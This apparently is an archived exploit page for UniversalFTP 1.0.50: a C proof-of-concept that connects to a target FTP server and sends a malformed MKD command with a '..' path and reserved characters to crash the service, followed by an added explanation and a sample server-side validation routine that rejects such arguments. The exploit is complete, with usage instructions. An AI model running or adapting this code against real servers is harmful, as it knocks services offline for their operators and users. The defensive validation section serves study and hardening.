UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit
Source: glinares.code[at]gmail[dot]com  Author: Greg  Published: 2006-11-20

/*
=============================================================
DoS Exploit for UniversalFTP version 1.0.50
=============================================================
UniversalFTP (www.teamtek.net)
http://www.5e5.net/cgi-bin/download3.asp
Suffers from several unhandled user input vulnerabilities that
cause the program to crash.

I originally found this vulnerability on October 27th and wrote
this but got caught up working with the Renasoft PSS Exploit
and forgot to report it.

The vulnerability was posted to secunia by Parvez Anwar November
13th - good job and thanks to him :).

*/

#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define BUFF_SIZE 1024

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
WSADATA wsaData;
char buffer[BUFF_SIZE];

struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int i;
char *hostname;
unsigned short port;

if (argc <= 1)
{
printf("\n==================================================================\n");
printf("UniversalFTP v1.0.50 Denial Of Service PoC Code\n");
printf("Discovered By: Parvez Anwar and Greg Linares (glinares.code [at] gmail [dot] com)\n");
printf("Original Reported By: Parvez Anwar\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("default port is 21 \n");
printf("====================================================================\n");
exit(0);
}

hostname = argv[1];
// the port argument is optional; fall back to the FTP default
if (argc > 2) port = (unsigned short)atoi(argv[2]);
else port = 21;

if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}


hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Unknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}

sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}

if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}

printf("Connected to [%s] on port [%d], sending exploit....\n",
hostname, port);


// leave room for the terminating NUL written below
if ((bytes = recv(sockfd, buf, sizeof(buf) - 1, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}

// wait for the FTP service welcome banner (a 2xx reply)

buf[bytes] = '\0';
check = strstr(buf, "2");
if (check == NULL)
{
printf("ERROR: NO response from FTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("%s\n", buf);

char Exploit[] = "MKD \\..\\******\\|\\******";


send(sockfd, Exploit, strlen(Exploit),0);
Sleep(1000);
printf("[*] FTP DoS Packet Sent\n");

closesocket(sockfd);
WSACleanup();
return 0;
}
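
Seen from the server side, the request above is an MKD argument that carries a `..` component and characters (`|`, `*`) that Windows does not allow in names. The following is an added example, not code from the original post or from UniversalFTP: a hypothetical `mkd_arg_is_safe()` check a server could run before the argument reaches any filesystem call. The 255-byte limit and the rejection rules are assumptions, since the page does not state the root cause.

```c
#include <stdio.h>
#include <string.h>

#define MKD_ARG_MAX 255              /* assumed limit, not from the page */

/* Characters Windows rejects in file and directory names. */
static const char BAD_CHARS[] = "<>:\"|?*";

/* Hypothetical server-side check: returns 1 if an MKD argument may be
   passed on to the filesystem layer, 0 if it must be refused. */
int mkd_arg_is_safe(const char *arg)
{
    size_t i, comp_len = 0, dots = 0;

    if (arg == NULL || arg[0] == '\0')
        return 0;
    for (i = 0; ; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (i > MKD_ARG_MAX)
            return 0;                /* over-long argument */
        if (c == '\0' || c == '/' || c == '\\') {
            /* End of a path component: refuse ".", ".." and other
               dot-only names, which Windows resolves or strips. */
            if (comp_len > 0 && dots == comp_len)
                return 0;
            if (c == '\0')
                break;
            comp_len = dots = 0;
            continue;
        }
        if (c < 0x20 || c == 0x7f || strchr(BAD_CHARS, c) != NULL)
            return 0;                /* control or reserved character */
        if (c == '.')
            dots++;
        comp_len++;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample arguments; the first is the one sent above. */
    const char *samples[] = { "\\..\\******\\|\\******", "reports\\2006",
                              "a|b", "/pub/new dir" };
    size_t n;
    for (n = 0; n < sizeof(samples) / sizeof(samples[0]); n++)
        printf("%-24s -> %s\n", samples[n],
               mkd_arg_is_safe(samples[n]) ? "accept" : "501 refuse");
    return 0;
}
```

A refused argument would be answered with a 501 reply and logged, so repeated rejected MKD requests from one client show up in the server log.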



 